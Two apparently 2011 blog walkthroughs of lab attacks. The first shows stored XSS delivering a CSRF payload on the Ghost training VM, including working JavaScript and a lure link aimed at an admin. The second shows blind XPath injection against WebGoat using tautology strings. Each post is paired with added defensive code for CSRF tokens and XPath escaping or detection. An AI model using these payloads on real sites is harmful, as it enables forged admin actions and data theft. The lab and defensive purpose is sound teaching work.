
Monday, September 5, 2011

Play with CSRF

Cross-Site Request Forgery (CSRF/XSRF)

A kind of injection vulnerability: the attacker exploits the trust that a site has in its authenticated user.
For more information, please check the references.

Victim:   Ghost VM (XSS & CSRF), admin user on the Ghost server
Attacker: test user on the Ghost server

Attacking process:
1, Log in to the Ghost server as the admin user.
2, Submit "<script>alert(1)</script>" to check whether there is an XSS vulnerability. Of course there is...

3, Use a web proxy (such as Burp) to check and analyze how the web application works.
Here we enter the test string "abc" and submit it.
Burp captures the first request:

Burp captures the second request:

Now we understand how it works:
Two requests are sent to the server, so the attacking script also needs to send two requests.

We construct the malicious JavaScript:

<script>
function test()
{
  // Body of the first request, the same fields the Burp capture showed for the form post
  var pd="vuln=<h1>Hacked%20by%20F4l13n5n0w&user=admin";
  var xmlhttp=new XMLHttpRequest();
  xmlhttp.onreadystatechange=function() {
    // readyState 4 = the first request has completed; only then send the second one, once
    if (xmlhttp.readyState!==4) return;
    var xmlhttp2=new XMLHttpRequest();
    xmlhttp2.open("GET", "/ghost/iframe.php?page=form.php", true);
    xmlhttp2.send();
  };
  // First request: the POST that stores the entry, sent with the admin's cookies
  xmlhttp.open("POST", "/ghost/blogView.php", true);
  xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xmlhttp.send(pd);
}
</script>
Hi admin, Here is a problem. Pls <a href="" onclick="test()">check!</a>

Log in to the server as the test user, submit the attacking code, and then wait for the admin to click it.

If the admin is tricked into clicking the "check" link, he submits the sentence "Hacked by F4l13n5n0w" to the server in the background.

Done.
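The post shows why the forged POST is accepted: blogView.php trusts whatever arrives with the admin's session cookie. The following server-side check is an added example written for this page, not code from the Ghost VM or from the post; the session store, the origin "http://ghost.example", the field name csrf_token and the function names are all assumptions. It binds a random synchronizer token to each session, compares it in constant time, and refuses a POST whose Origin header names another site, so the two-request payload above (which carries no token) is rejected while the site's own form is accepted.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed, in-memory session store: session id -> {"user": ..., "csrf": ...}.
# A real PHP deployment would keep this in the server-side session instead.
SESSIONS = {}
SITE_ORIGIN = "http://ghost.example"  # hypothetical origin of the vulnerable blog


def new_session(user):
    """Create a logged-in session and bind a fresh random CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token(sid):
    """Token the server embeds as a hidden field in its own form (form.php)."""
    return SESSIONS[sid]["csrf"]


def handle_blog_post(sid, headers, body):
    """Server-side handling of POST /ghost/blogView.php with CSRF checks.

    Returns (status, message). Checks, in order:
      1. the request carries a valid session;
      2. if the browser sent an Origin header, it must be our own origin;
      3. the body must carry the session's synchronizer token (constant-time compare).
    """
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "no session"

    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin POST refused"

    fields = parse_qs(body, keep_blank_values=True)
    token = fields.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token.encode(), session["csrf"].encode()):
        return 403, "missing or wrong CSRF token"

    # The server acts on the session's identity, not on a user-supplied "user=admin" field.
    return 200, "posted %r as %s" % (fields.get("vuln", [""])[0], session["user"])


if __name__ == "__main__":
    admin = new_session("admin")
    # The body the post's payload sends: no token, so it is now rejected.
    forged = "vuln=<h1>Hacked%20by%20F4l13n5n0w&user=admin"
    print(handle_blog_post(admin, {"Origin": SITE_ORIGIN}, forged))
    # The site's own form includes the hidden token and is accepted.
    legit = "vuln=abc&csrf_token=" + csrf_token(admin)
    print(handle_blog_post(admin, {"Origin": SITE_ORIGIN}, legit))
```

One caveat that matters for this exact lab: the payload is delivered through the stored XSS found in step 2, so it runs on the blog's own origin. There the Origin check and a SameSite cookie do not help, and a same-origin script could read the hidden token out of form.php before posting. The token stops forgery from other sites; the XSS has to be fixed as well (HTML-encode the stored entry on output) for the check to hold.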


Reference:
[1] http://www.cgisecurity.com/csrf-faq.html
[2] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
[3] http://www.w3schools.com/ajax/ajax_xmlhttprequest_send.asp



Tuesday, August 23, 2011

Play with XPATH Blind Explorer

xpath-blind-explorer v1.0 was released at Black Hat USA 2011.

It is an automated tool that retrieves the whole XML document through an XPath injection vulnerability.

Check the following links for more information:

Demo video:
https://www.youtube.com/watch?v=IDQAj09fBvI&feature=related

Download:
http://code.google.com/p/xpath-blind-explorer/downloads/list


In the demo video, only the GET method with one parameter was presented.

What about the POST method with multiple parameters?

Let's use it against the WebGoat XPath Injection challenge.

Victim:   WebGoat (XPath Injection lesson)
Attacker: Windows with xpath-blind-explorer v1.0

Attacking process:

1, Submit a correct and an incorrect username/password pair (e.g. Mike/test123) to see the difference between the responses.




If the username and password are correct, the server returns the user's information; otherwise it returns nothing.
So here we use "468100" as the keyword for the "true" condition.


2, Check the source code to find the form's request URL and parameter names.
Using Firebug, we found the request URL is

http://192.168.235.134/WebGoat/attack?Screen=83&menu=1200

The parameter names:

Username, Password and SUBMIT


3, Configure XPath Blind Explorer as follows:




Use Burp Proxy (listening on localhost, port 8080) to check how the request is created.

Add the session cookie in order to pass the authentication with the WebGoat server.


4, Now we test the condition.

Test the "true" condition:

Let's see the request captured by Burp Proxy.




The injection code "'%20and%20'1'='1" is just appended to the end of all of the parameters (which are URL encoded). That means XPath Blind Explorer treats the multiple parameters as one single parameter: in the capture, "Username" is the parameter's name and the URL-encoded remainder is its value.

So now we need to solve two problems:

1, The injection code is only appended at the end of the parameters, so we need to change the order of the parameters and put the injectable parameter last, such as:

SUBMIT=Submit&Username=Mike&Password=test123


2, Because XPath Blind Explorer treats all parameters as one parameter, the whole string is URL encoded, including the parameter separator "&" (which becomes "%26" but should not be encoded). So we need to replace it back to "&".

Here we use Burp Proxy's "match and replace" function, configured as follows.


Here the regex "(%26)" is used to match the keyword.



Now everything is ready. Let's launch it.

After waiting several minutes, we have the whole XML file.
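Two things in this walkthrough are worth seeing from the server's side: what the probe looks like in the request body (including the "%26" problem from step 4), and why the injection works at all. The following is an added example written for this page, not code from WebGoat or from xpath-blind-explorer; the sample bodies are constructed, and the element names in build_login_query are assumptions, not WebGoat's real XML layout. flag_xpath_probes decodes a POST body the way a server does and flags parameters whose value carries the "' and '1'='1" tautology shape, so the probes from this post stand out in access logs; xpath_literal shows the fix, since XPath 1.0 has no parameter binding and no escape sequence inside string literals, so a value must be wrapped in the other quote kind or assembled with concat().

```python
import re
from urllib.parse import parse_qsl

# Constructed POST bodies in the shape the WebGoat login form sends, including
# the probe XPath Blind Explorer appended in the Burp capture. Not real traffic.
SAMPLE_BODIES = [
    "Username=Mike&Password=test123&SUBMIT=Submit",                          # normal login
    "SUBMIT=Submit&Username=Mike&Password=test123'%20and%20'1'='1",          # "true" probe
    "SUBMIT=Submit&Username=Mike&Password=test123'%20and%20'1'='2",          # "false" probe
    # The tool's first attempt: all parameters URL-encoded as one value, so "&" became "%26"
    "Username=Mike%26Password=test123%27%20and%20%271%27%3D%271&SUBMIT=Submit",
]

# A quote that closes the literal, a boolean operator, then a comparison: the
# shape of the tautology probes ('1'='1 / '1'='2) used in blind XPath injection.
TAUTOLOGY = re.compile(r"""['"]\s*(?:and|or)\s+['"]?\w*['"]?\s*=""", re.IGNORECASE)


def flag_xpath_probes(body):
    """Return the names of the parameters whose decoded value looks like a probe."""
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        # parse_qsl splits on the raw "&" first and percent-decodes each piece
        # afterwards, so a "%26" inside a value stays part of that value: the
        # server sees one parameter, exactly the problem hit in step 4.
        if TAUTOLOGY.search(value):
            hits.append(name)
    return hits


def xpath_literal(value):
    """Encode an arbitrary string as an XPath 1.0 string literal.

    A value without single quotes is single-quoted, a value without double
    quotes is double-quoted, and one containing both is assembled with
    concat(). The result can never close the quoting and continue the query.
    """
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join("'%s'" % p for p in parts) + ")"


def build_login_query(username, password):
    """Hypothetical login lookup (element names assumed, not WebGoat's real XML)."""
    return "//user[Username/text()=%s and Password/text()=%s]" % (
        xpath_literal(username), xpath_literal(password))


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(flag_xpath_probes(body) or "clean", "<-", body)
    # The "true" probe ends up inside a double-quoted literal and matches no user.
    print(build_login_query("Mike", "test123' and '1'='1"))
```

The fourth sample body reproduces the capture from step 4: the server sees a single parameter named Username whose value is "Mike&Password=test123' and '1'='1", which is why the tool's probe never reached the Password field until the "%26" was replaced. On the fixing side, escaping is the minimum; the WebGoat lesson's "true"/"false" oracle only exists because the response differs by user data, so comparing the looked-up password in code rather than inside the XPath predicate removes the oracle entirely.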

Reference:
[1] http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
[2] http://www.zytrax.com/tech/web/regex.htm
[3] http://www.addedbytes.com/cheat-sheets/regular-expressions-cheat-sheet/
[4] http://www.regextester.com/